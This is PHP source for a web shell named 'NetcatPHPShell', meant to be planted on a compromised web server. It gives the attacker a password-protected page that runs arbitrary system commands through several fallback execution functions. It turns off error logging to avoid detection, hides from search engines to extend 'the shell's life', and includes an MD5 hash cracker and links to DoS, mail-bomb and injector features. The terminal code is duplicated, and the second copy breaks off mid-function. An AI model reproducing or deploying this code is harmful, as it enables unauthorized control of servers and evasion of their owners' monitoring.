Untitled

<?php
/*
#############################################
#                                ––•(–•- NetcatPHPShell –•–)•––                                #

#                                      .::+ c0d3d by Mr.H4rD3n +::.                                    #

#                            NetcatPHPShell ( Released on 11/04/12 )                     #

#                                  Email: exploit-id@hotmail.com                                      #

#############################################


*/

error_reporting(0);
ini_set('max_execution_time',0);


// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\

/**************** Defines *********************************/

$greeting = "";
$user = "root";
$pass = "islamic";
$lock = "on"; // set this to off if you dont need the login page
$antiCrawler = "off"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
$tracebackFeature = "off"; // set this feature to enable email alerts
$ownerEmail = "exploit-id@hotmail.com"; // Change this to your email , This email is used to deliver tracebacks about your shell
$url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$phpVersion=phpversion();
$self=$_SERVER["PHP_SELF"]; // Where am i
$sm = @ini_get('safe_mode');
$SEPARATOR = '/'; // Default Directory separator
$os = "N/D";

if(stristr(php_uname(),"Windows"))
{
        $SEPARATOR = '\\';
        $os = "Windows";
}
else if(stristr(php_uname(),"Linux"))
{
        $os = "Linux";
}


//*************************************************************/

// -------------- Traceback Functions

function sendLoginAlert()
{
    global $ownerEmail;
    global $url;
    $accesedIp = $_SERVER['REMOTE_ADDR'];
    $randomInt = rand(0,1000000);           # to avoid id blocking
    $from = "ani-shell$randomInt@fbi.gov";

    //echo $from;

    if(function_exists('mail'))
    {
        $subject = "Shell Accessed -- Ani-Shell --";
        $message = "
Hey Owner ,

        Your Shell(Ani-Shell) located at $url was accessed by $accesedIp

        If its not you :-

        1. Please check if the shell is secured.
        2. Change your user name and Password.
        3. Check if lock is 0n!
        and Kick that ****** out!

        Thanking You

Yours Faithfully
Ani-Shell
        ";
        mail($ownerEmail,$subject,$message,'From:'.$from);
    }
}

//---------------------------------------------------------


if(function_exists('session_start') && $lock == 'on')
{
    session_start();
}
else
{
    // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported
    $lock = 'off';
}

//logout

if(isset($_GET['logout']) && $lock == 'on')
{
    $_SESSION['authenticated'] = 0;
    session_destroy();
    header("location: ".$_SERVER['PHP_SELF']);
}

ini_set('max_execution_time',0);


/***************** Restoring *******************************/


ini_restore("safe_mode_include_dir");
ini_restore("safe_mode_exec_dir");
ini_restore("disable_functions");
ini_restore("allow_url_fopen");
ini_restore("safe_mode");
ini_restore("open_basedir");

if(function_exists('ini_set'))
{
    ini_set('error_log',NULL);  // No alarming logs
    ini_set('log_errors',0);    // No logging of errors
    ini_set('file_uploads',1);  // Enable file uploads
    ini_set('allow_url_fopen',1);   // allow url fopen
}

else
{
    ini_alter('error_log',NULL);
    ini_alter('log_errors',0);
    ini_alter('file_uploads',1);
    ini_alter('allow_url_fopen',1);
}

// ----------------------------------------------------------------------------------------------------------------


?>
<html>
<head>
<title>––•(–•- NetcatPHPShell –•–)•–– | By Mr.H4rD3n | Mad In Morocco</title>

<?php
if($antiCrawler != 'off')
{
    ?>
    <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
    <?php
}
?>

<style>

/*
==========================
    CSS Section
==========================
*/

*{
    padding:0;
    margin:0;
}

.alert
{
    background:red;
    color:white;
    font-weight:bold;
}
td.info
{
    width:0px;
}

.bind
{
    border: 1px solid #333333;
    margin: 15px auto 0;
    font-size: small;
}

div.end *
{
    font-size:small;
}

div.end
{
    width:100%;
    background:#529ADE;
}

p.blink
{
    text-decoration: blink;
}

body
{
    background-color:black;
    color:rgb(35,182,39);
    font-family:Tahoma,Verdana,Arial;
    font-size: small;
}

input.own {
    background-color: Green;
    color: white;
    border : 1px solid #529ADE;
}

blockquote.small
{
    font-size: smaller;
    color: silver;
    text-align: center;
}

table.files
{
    border-spacing: 10px;
    font-size: small;
}

h1 {
    padding: 4px;
    padding-bottom: 0px;
    margin-right : 5px;
}
div.logo
{
    border-right: 1px aqua solid;
}
div.header
{
    padding-left: 5px;
    font-size: small;
    text-align: left;
}
div.nav
{
    margin-top:1px;
    height:30px;
    background-color: #529ADE;
}
div.nav ul
{
    list-style: none;
    padding: 4px;
}
div.nav li
{
    float: left;
    margin-right: 10px;
    text-align:center;
}
textarea.cmd
{
    border : 1px solid #111;
    background-color : green;
    font-family: Shell;
    color : white;
    margin-top: 10px;
    font-size:small;
}

input.cmd
{
    background-color:black;
    color: white;
    width: 400px;
    border : 1px solid #529ADE;

}
td.maintext
{
    font-size: large;
}
#margins
{
    margin-left: 10px;
    margin-top: 10px;
    color:white;
}
table.top
{
    border-bottom: 1px solid aqua;
    width: 100%;
}
#borders
{
    border-top : 1px solid aqua;
    border-left:1px solid aqua;
    border-bottom: 1px solid aqua;
    border-right: 1px solid aqua;
    margin-bottom:0;
}
td.file a , .file a
{
    color : aqua;
    text-decoration:none;
}
a.dir
{
    color:white;
    font-weight:bold;
    text-decoration:none;
}
td.dir a
{
    color : white;
    text-decoration:none;
}
td.download,td.download2
{
    color:green;
}
#spacing
{
    padding:10px;
    margin-left:200px;
}
th.header
{
    background: none repeat scroll 0 0 #191919;
    color: white;
    border-bottom : 1px solid #333333;
}
p.warning
{
    background : red;
    color: white;
}

/*

--------------------------------CSS END------------------------------------------------------

*/
</style>
</head>

<body text="rgb(39,245,10)" bgcolor="black" style="background-color:#000000">
<?php

if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
{
    if( $_POST['user'] == $user &&
         $_POST['pass'] == $pass )
    {
            $_SESSION['authenticated'] = 1;
            // --------------------- Tracebacks --------------------------------
            if($tracebackFeature == 'On')
            {
                sendLoginAlert();
            }
            // ------------------------------------------------------------------
    }
}

if($lock == 'off')
{?>
    <p class="warning"><font color="#FF0000"><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></font></p>
<?php
}

if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
{

?>
<table height="421" width="993">
    <tbody>
        <tr>
            <td width="448">
        <pre>
<font color="Orange">
<b>
</b></font><b><font color="#19D2FE">[]======================================[]
[]-----------</font><font color="#FFFFFF">NetcatPHPShell</font><font color="#19D2FE">-------------[]
[]---------------</font><font color="#CC6600">Private</font><font color="#19D2FE">----------------[]
[]======================================[]
[]   </font><font color="#FFFFFF">–</font><font color="#19D2FE">–</font><font color="#FF0000">•(</font><font color="#19D2FE">-• c0d3d by Mr.H4rD3n •-</font><font color="#FF0000">)•</font><font color="#19D2FE">–</font><font color="#FFFFFF">–</font><font color="#19D2FE">   []</font></b></pre>
        <pre>
<b><font color="#19D2FE">[]======================================[]
[] NetcatPHPShell Released on </font><font color="#FFFFFF">11/04/12</font><font color="#19D2FE">  []</font></b></pre>
        <pre>
<b><font color="#19D2FE">[]======================================[]
[]    </font><font color="#CC6600">WeLcOmE Master Of The Server !</font><font color="#19D2FE">    []
[]======================================[]</font></b></pre>
        <pre><b><font color="#19D2FE">[]           Moroccan </font><font color="#FFFFFF">Hackers</font><font color="#19D2FE">           []
[]            </font><font color="#FFFFFF">Moroccan</font><font color="#19D2FE"> C0d3r            []</font></b></pre>
        <pre><b><font color="#19D2FE">[]           Moroccan </font><font color="#FFFFFF">Masters           </font><font color="#19D2FE">[]</font></b></pre>
        <pre><b><font color="#19D2FE">[]======================================[]
[]            </font><font color="#CC6600">MaD </font><font color="#FFFFFF">In</font><font color="#CC6600"> </font><font color="#19D2FE">MoRoCcO            []</font></b></pre>
        <pre><b><font color="#19D2FE">[]======================================[]
[]                                      []
[]     </font><font color="#CC6600">Netcat</font><font color="#19D2FE"> </font><font color="#FFFFFF">PHP Connect to Server</font><font color="#19D2FE">     []</font></b></pre>
        <pre><b><font color="#19D2FE">[]                                      []
[]======================================[]
[]    </font><font color="#CC6600">My Groupe</font><font color="#19D2FE"> </font><font color="#FFFFFF">IsLamiC Warrior Team</font><font color="#19D2FE">    []
[]======================================[]
[]  </font><font color="#FF0000">  </font><font color="#CC6600">Email:</font><font color="#19D2FE"> </font><font color="#FFFFFF">exploit-id@hotmail.com</font><font color="#19D2FE">     []
[] </font><font color="#CC6600"> Facebook :</font><font color="#19D2FE"> </font><font color="#FFFFFF">Facebook.com/Mr.H4rD3n</font>   <font color="#19D2FE">[]
[]</font><font color="#19D2FE">======================================[]</font><font color="grey">
</font></b><font color="grey">
</pre>
            </td>
            <td>
                <h1><?php echo $greeting;?></h1>
                <img alt="http://img4.imageshack.us/img4/3096/piccat.gif" src="http://img4.imageshack.us/img4/3096/piccat.gif"><br /><br />
                <form method="POST" action="<?php echo $_SERVER['PHP_SELF'];?>">
                <input name="user" value="UserNamE" style="color: #19D2FE; background-color: #000000" size="20"/>
                <input name="pass" type="password" value="passwd" style="color: #19D2FE; background-color: #000000" size="20"/>
                <input class="own" type="submit" value="GO TO HeLL" style="color: #42CFF9; background-color: #000000"/>
                </form>
            </td>
        </tr>
    </tbody>
</table>
<?php
}
//---------------------------------- We are authenticated now-------------------------------------
//Launch the shell
else
{
    //---------------------------------- Fuctions ---------------------------------------------------

    function showDrives()
    {
        global $self;
        foreach(range('A','Z') as $drive)
        {
            if(is_dir($drive.':\\'))
            {
                ?>
                <a class="dir" href='<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>'>
                    <?php echo $drive.":\\" ?>
                </a>
                <?php
            }
        }
    }

    function HumanReadableFilesize($size)
    {

        $mod = 1024;

        $units = explode(' ','B KB MB GB TB PB');
        for ($i = 0; $size > $mod; $i++)
        {
            $size /= $mod;
        }

        return round($size, 2) . ' ' . $units[$i];
    }

function getClientIp()
{
    echo $_SERVER['REMOTE_ADDR'];
}

function getServerIp()
{
    echo getenv('SERVER_ADDR');
}
function getSoftwareInfo()
{
    echo php_uname();
}
function diskSpace()
{
    echo HumanReadableFilesize(disk_total_space("/"));
}
function freeSpace()
{
    echo HumanReadableFilesize(disk_free_space("/"));
}
function getSafeMode()
{
        global $sm;
        echo($sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF");

}

function getDisabledFunctions()
{
    if(!ini_get('disable_functions'))
    {
        echo "None";
    }
    else
    {
            echo @ini_get('disable_functions');
    }
}

function getFilePermissions($file)
{

$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
} else {
    // Unknown
    $info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));

return $info;

}

/***********************************************************/
// exec_all , A function used to execute commands , This function will only execute if the Safe Mode is
// Turned OfF!
/**********************************************************/


function exec_all($command)
{

    $output = '';
    if(function_exists('exec'))
    {
        exec($command,$output);
        $output = join("\n",$output);
    }

    else if(function_exists('shell_exec'))
    {
        $output = shell_exec($command);
    }

    else if(function_exists('popen'))
    {
        $handle = popen($command , "r"); // Open the command pipe for reading
        if(is_resource($handle))
        {
            if(function_exists('fread') && function_exists('feof'))
            {
                while(!feof($handle))
                {
                    $output .= fread($handle, 512);
                }
            }
            else if(function_exists('fgets') && function_exists('feof'))
            {
                while(!feof($handle))
                {
                    $output .= fgets($handle,512);
                }
            }
        }
        pclose($handle);
    }


    else if(function_exists('system'))
    {
        ob_start(); //start output buffering
        system($command);
        $output = ob_get_contents();    // Get the ouput
        ob_end_clean();                 // Stop output buffering
    }

    else if(function_exists('passthru'))
    {
        ob_start(); //start output buffering
        passthru($command);
        $output = ob_get_contents();    // Get the ouput
        ob_end_clean();                 // Stop output buffering
    }

    else if(function_exists('proc_open'))
    {
        $descriptorspec = array(
                1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
                );
        $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
        if(is_resource($handle))
        {
            if(function_exists('fread') && function_exists('feof'))
            {
                while(!feof($pipes[1]))
                {
                    $output .= fread($pipes[1], 512);
                }
            }
            else if(function_exists('fgets') && function_exists('feof'))
            {
                while(!feof($pipes[1]))
                {
                    $output .= fgets($pipes[1],512);
                }
            }
        }
        pclose($handle);
    }
    else
    {
        $output = "They have their Security there! :( ";
    }

    return(htmlspecialchars($output));

}
function magicQuote($text)
{
    if (!get_magic_quotes_gpc())
    {
        return $text;
    }
    return stripslashes($text);
}

function md5Crack($hash , $list)
{
    $fd = fopen($list,"r");
    if( strlen($hash) != 32  || $fd == FALSE)
    {
        // echo "$hash , " . strlen($hash) ." , $list , $fd"; // Debugging
        return "<p class='warning'>Hash or List invalid!</p>";
    }
    else
    {
        $pwdList = fread($fd,512);

        $pwdList = explode("\n",$pwdList);

        echo "Words Checked :-<br /><br />\n";


        foreach($pwdList as $pwd)
        {
            $pwd = trim($pwd);

            echo "<br />[*] ".$pwd;

            if(md5($pwd) == $hash )
            {
                return "<br /><br /><br />\n<h2>Hash Cracked</h2><br /><br />\n<p class='warning'>Planintext : $pwd</p>";
            }
        }


    }
}
//------------------------------------------------------------------------------------------------


?>

<div class="nav" style="width: 1005px; height: 49px">
<ul>
    <li><a href="<?php echo $self;?>"></a></li>
    <li><a href="<?php echo $self.'?upload';?>"></a></li>
    <li><a href="<?php echo $self.'?shell';?>"></a></li>
    <li><a href="<?php echo $self.'?dos';?>"></a></li>
    <li><a href="<?php echo $self.'?fuzz';?>"></a></li>
    <li><a href="<?php echo $self.'?mail'?>"></a></li>
    <li><a href="<?php echo $self.'?bomb'?>"></a></li>
    <li><a href="<?php echo $self.'?connect'?>"></a></li>
    <li><a href="<?php echo $self.'?injector'?>"></a></li>
    <li><a href="<?php echo $self.'?decode'?>"></a></li>
    <li><a href="<?php echo $self.'?eval'?>"></a></li>
    <li><a href="<?php echo $self.'?md5'?>"></a></li>

    <?php if($lock == 'on')
    {
    ?>
        <li>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font face="Times New Roman" size="4">&nbsp;</font><font face="Times New Roman" size="5">
        </font>
        <i><font face="Verdana" size="5">
        <a href="<?php echo $self.'?logout'?>">
        <font color="#FFFFFF"><span style="text-decoration: none">I m Out!</span></font></a></font></i><font color="#FF0000"><b><i><font face="Verdana" size="5"></li></font></i><font face="Verdana" size="5"> </font>
        </b><font face="Times New Roman" size="5">
    <?php
    }
    ?>
</font>
</font>
</ul>
</div>

<?php
//-------------------------------- Check what he wants -------------------------------------------

// Shell

if(isset($_GET['shell']))
{
    if(!isset($_GET['cmd']) || $_GET['cmd'] == '')
    {
        $result = "";
    }
    else
    {
        $result=exec_all($_GET['cmd']);
    }
    ?>
    <?php
}

//Rename

else if(isset($_GET['rename']))
{
    if(isset($_GET['to']) && isset($_GET['rename']))
    {
        if(rename($_GET['rename'],$_GET['to']) == FALSE)
        {
            ?>
            <?php
        }
    }
    else
    {
?>
    <?php
    }
}


// No request made
// Display home page

else
{
    $dir = getcwd();
    if(isset($_GET['dir']))
    {
        $dir = $_GET['dir'];
    }
    ?>

        <p>&nbsp;</p>

<?php

$aliases = array('la' => 'ls -la',
'll' => 'ls -lvhF',
'dir' => 'ls' );
$passwd = array('' => '');
error_reporting(0);
class phpTerm {

function formatPrompt() {
$user=shell_exec("whoami");
$host=explode(".", shell_exec("uname -n"));
$_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0])."";
}

function checkPassword($passwd) {
if(!isset($_SERVER['PHP_AUTH_USER'])||
!isset($_SERVER['PHP_AUTH_PW']) ||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
@session_start();
return true;
}
else {
@session_start();
return true;
}
}

function initVars()
{
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset']))
{
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
$_REQUEST['command'] ='';
}
}

function buildCommandHistory()
{
if(!empty($_REQUEST['command']))
{
if(get_magic_quotes_gpc())
{
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}

// drop old commands from list if exists
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
{
unset($_SESSION['history'][$i]);
}
array_unshift($_SESSION['history'], $_REQUEST['command']);

// append commmand */
$_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n";
}
}

function buildJavaHistory()
{
// build command history for use in the JavaScript
if (empty($_SESSION['history']))
{
$_SESSION['js_command_hist'] = '""';
}
else
{
$escaped = array_map('addslashes', $_SESSION['history']);
$_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
}
}

function outputHandle($aliases)
{
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command']))
{
$_SESSION['cwd'] = getcwd(); //dirname(__FILE__);
}
elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs))
{
// The current command is 'cd', which we have to handle as an internal shell command.
// absolute/relative path ?"
($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1];

// cosmetics
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

if(empty($new_dir)): $new_dir = "/"; endif;

(@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n";
}
else
{
/* The command is not a 'cd' command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']);

/* Alias expansion. */
$length = strcspn($_REQUEST['command'], " \t");
$token = substr(@$_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);

$p = proc_open(@$_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);

/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');
}

fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
} // end phpTerm

/*##########################################################
## The main thing starts here
## All output ist XHTML
##########################################################*/

$terminal=new phpTerm;

@session_start();

$terminal->initVars();
$terminal->buildCommandHistory();
$terminal->buildJavaHistory();
if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
$terminal->outputHandle($aliases);

header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>.:: --+ NeTCaTPHPShell +-- ::.</title>

<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $_SESSION['js_command_hist']; ?>);
var last = 0;

function key(e) {
if (!e) var e = window.event;

if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}

if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}

}

function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}

</script>
<style type="text/css">
body {font-family: sans-serif; color: black; background: white;}
table{width: 600px; height: 300px; border: 1px #000000 solid; padding: 0px; margin: 0px;}
td.head{background-color: #529ADE; color: #529ADE; font-weight:700; border: none; text-align: center; font-style: italic}
textarea {width: 100%; border: none; padding: 2px 2px 2px; color: #529ADE; background-color: #000000;}
p.prompt {font-family: monospace; margin: 0px; padding: 0px 2px 2px; background-color: #000000; color: #529ADE;}
input.prompt {border: none; font-family: monospace; background-color: #000000; color: #529ADE;}
</style>
</head>

<body onload="init()" style="background-color:#000000">

nd  )'<?php if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 26; ?>

<div align="center">

<img alt="http://img4.imageshack.us/img4/3096/piccat.gif" src="http://img4.imageshack.us/img4/3096/piccat.gif"><p>
<font color="#FFFFFF">
-------------------------------------------------------------------------------------</font></p>
<p><font face="Times New Roman" color="#529ADE" size="4">–</font><font color="#FFFFFF" face="Times New Roman" size="4">–</font><font color="#FF0000" face="Times New Roman" size="4">–•</font><font size="4"><font color="#42CFF9" face="Times New Roman">(</font><font color="#FF0000" face="Times New Roman">-</font><font color="#27F50A" face="Times New Roman">•</font><b><font color="#529ADE" face="Times New Roman">
© Copyright </font><font color="#FF0000" face="Times New Roman">Mr.H4rD3n</font><font color="#529ADE" face="Times New Roman">
</font><font color="#FFFF00" face="Times New Roman">[ </font><font color="#529ADE" face="Times New Roman">All
rights reserved </font><font color="#FFFF00" face="Times New Roman">]</font><font color="#529ADE" face="Times New Roman">
</font><font color="#27F50A" face="Times New Roman">•</font><font color="#FF0000" face="Times New Roman">-</font><font color="#42CFF9" face="Times New Roman">)</font></b></font><b><font color="#FF0000" face="Times New Roman" size="4">•–</font><font color="#FFFFFF" face="Times New Roman" size="4">–</font></b></p>
<p>
<font color="#FFFFFF">
-------------------------------------------------------------------------------------</font></p>
<p><font face="Comic Sans MS" color="#42CFF9">gEt Commands to Server - Pypass</font></p>

<table cellpadding="0" cellspacing="0">
<tr><td class="head" style="color: #000000;"><font color="#FFFFFF"><b>X</b></font></td>
<td class="head"><font color="#FFFFFF"><?php echo $_SESSION['prompt'].":"."$_SESSION[cwd]"; ?>
</font>
</td></tr>
<tr><td width='100%' height='100%' colspan='2'><form name="shell" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
<textarea name="output" readonly="readonly" cols="85" rows="<?php echo $_REQUEST['rows'] ?>">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea>
<p class="prompt"><?php echo $_SESSION['prompt'].":>"; ?>
<input class="prompt" name="command" type="text" onkeyup="key(event)" size="50" tabindex="1">
</p>

<? /*<p>
<input type="submit" value="Execute Command" />
<input type="submit" name="reset" value="Reset" />
Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" />
</p>

*/
?>
</form></td></tr>
</body>
</html>
<?php ?>
<?php

$aliases = array('la' => 'ls -la',
'll' => 'ls -lvhF',
'dir' => 'ls' );
$passwd = array('' => '');
error_reporting(1);
class phpTerm {

function formatPrompt() {
$user=shell_exec("whoami");
$host=explode(".", shell_exec("uname -n"));
$_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0])."";
}

function checkPassword($passwd) {
if(!isset($_SERVER['PHP_AUTH_USER'])||
!isset($_SERVER['PHP_AUTH_PW']) ||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
@session_start();
return true;
}
else {
@session_start();
return true;
}
}

function initVars()
{
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset']))
{
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
$_REQUEST['command'] ='';
}
}

function buildCommandHistory()
{
if(!empty($_REQUEST['command']))
{
if(get_magic_quotes_gpc())
{
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}

// drop old commands from list if exists
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
{
unset($_SESSION['history'][$i]);
}
array_unshift($_SESSION['history'], $_REQUEST['command']);

// append commmand */
$_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n";
}
}

function buildJavaHistory()
{
// build command history for use in the JavaScript
if (empty($_SESSION['history']))
{
$_SESSION['js_command_hist'] = '""';
}
else
{
$escaped = array_map('addslashes', $_SESSION['history']);
$_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
}
}

function outputHandle($aliases)
{
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command']))
{
$_SESSION['cwd'] = getcwd(); //dirname(__FILE__);
}
elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs))
{
// The current command is 'cd', which we have to handle as an internal shell command.
// absolute/relative path ?"
($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1];

// cosmetics
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

if(empty($new_dir)): $new_dir = "/"; endif;

(@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n";
}
else
{
/* The command is not a 'cd' command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']);

/* Alias expansion. */
$length = strcspn($_REQUEST['command'], " \t");
$token = substr(@$_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);

$p = proc_open(@$_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);

/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');
}

fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
} // end phpTerm

/*##########################################################
## The main thing starts here
## All output ist XHTML
##########################################################*/

$terminal=new phpTerm;

@session_start();

$terminal->initVars();
$terminal->buildCommandHistory();
$terminal->buildJavaHistory();
if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
$terminal->outputHandle($aliases);

header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
/*##########################################################
## safe mode increase
## bloque fonction
##########################################################*/
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>\-( CMD Command )-/</title>

<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $_SESSION['js_command_hist']; ?>);
var last = 0;

function key(e) {
if (!e) var e = window.event;

if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}

if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}

}

function init() {
document.shell.setAttribute("autocomplete", "off");
